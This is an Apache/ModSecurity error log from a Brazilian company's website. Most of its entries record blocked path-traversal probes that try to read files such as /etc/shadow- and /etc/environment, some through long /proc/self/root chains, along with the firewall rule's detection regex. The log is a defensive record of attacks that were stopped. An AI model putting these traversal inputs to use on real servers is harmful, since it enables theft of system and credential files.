[Wed Mar 18 00:26:31.955619 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:51826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobZ-yqAr6etmhZHNpiagAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:26:34.121791 2026] [proxy_fcgi:error] [pid 30821:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58270] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:26:43.999318 2026] [:error] [pid 31803:tid 140411708356352] [client 216.73.216.191:35068] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobc-yqAr6etmhZHNpibwAAAEQ"]
[Wed Mar 18 00:26:45.108353 2026] [:error] [pid 30077:tid 140411641214720] [client 216.73.216.191:29865] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobdfu8EFLIOrSqIpu1AQAAAkw"]
[Wed Mar 18 00:26:46.938656 2026] [:error] [pid 17653:tid 140411649607424] [client 216.73.216.191:54119] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobdcdf6f5d65gmYZR7-wAAAss"]
[Wed Mar 18 00:26:55.125793 2026] [proxy_fcgi:error] [pid 29882:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58648] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:27:11.680394 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:36488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobj-w_le52K8_3pV2LUwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:27:13.430074 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:56054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobkdY0UrI5A3LftIw7FwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:27:13.896559 2026] [:error] [pid 17653:tid 140411590858496] [client 216.73.216.191:41683] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobkcdf6f5d65gmYZR8BQAAAtI"]
[Wed Mar 18 00:27:18.064910 2026] [:error] [pid 19507:tid 140411674785536] [client 216.73.216.191:33812] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobltY0UrI5A3LftIw7HQAAAYg"]
[Wed Mar 18 00:27:18.133811 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:27:20.603601 2026] [:error] [pid 11816:tid 140411557287680] [client 216.73.216.191:56723] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobmOw_le52K8_3pV2LYQAAAhY"]
[Wed Mar 18 00:27:21.287491 2026] [:error] [pid 19507:tid 140411641214720] [client 216.73.216.191:17821] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobmdY0UrI5A3LftIw7IAAAAYw"]
[Wed Mar 18 00:27:25.429772 2026] [:error] [pid 15826:tid 140411649607424] [client 216.73.216.191:22555] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobneoXxyEfFpUF8f8YwgAAAUs"]
[Wed Mar 18 00:27:28.739790 2026] [:error] [pid 15051:tid 140411666392832] [client 216.73.216.191:47489] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboboCmAPhZkrhU8w4kb-gAAAIk"]
[Wed Mar 18 00:27:31.450695 2026] [:error] [pid 11816:tid 140411582465792] [client 216.73.216.191:54828] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobo-w_le52K8_3pV2LcgAAAhM"]
[Wed Mar 18 00:27:32.357424 2026] [:error] [pid 11816:tid 140411607643904] [client 216.73.216.191:31945] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobpOw_le52K8_3pV2LdAAAAhA"]
[Wed Mar 18 00:27:36.385417 2026] [:error] [pid 19507:tid 140411691570944] [client 216.73.216.191:13335] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobqNY0UrI5A3LftIw7KAAAAYY"]
[Wed Mar 18 00:27:36.928395 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:59652] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobqNa6ubjKNq_cu4ZBkAAAA0Q"]
[Wed Mar 18 00:27:39.085910 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59270] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:27:40.039254 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:61876] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobrOoXxyEfFpUF8f8YxgAAAUw"]
[Wed Mar 18 00:27:40.651894 2026] [:error] [pid 30077:tid 140411674785536] [client 216.73.216.191:41494] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobrPu8EFLIOrSqIpu1DQAAAkg"]
[Wed Mar 18 00:27:40.772053 2026] [:error] [pid 19507:tid 140411582465792] [client 216.73.216.191:26923] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobrNY0UrI5A3LftIw7LwAAAZM"]
[Wed Mar 18 00:27:48.284047 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:48366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobtNY0UrI5A3LftIw7OQAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:27:57.205243 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:58992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobvfu8EFLIOrSqIpu1FAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:28:01.069814 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59776] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:28:11.653056 2026] [:error] [pid 31803:tid 140411624429312] [client 216.73.216.191:14207] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboby-yqAr6etmhZHNpiiwAAAE4"]
[Wed Mar 18 00:28:18.243421 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:56056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abob0imAPhZkrhU8w4kcFQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:28:24.121925 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60306] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:28:44.402274 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:40352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abob7EzinOy1jxa1j4e9VgAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:28:45.125986 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60806] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:28:48.271403 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:41358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abob8AkwaGbbGflqUZC_3wAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:29:08.121862 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33078] AH01075: Error dispatching request to : (polling)
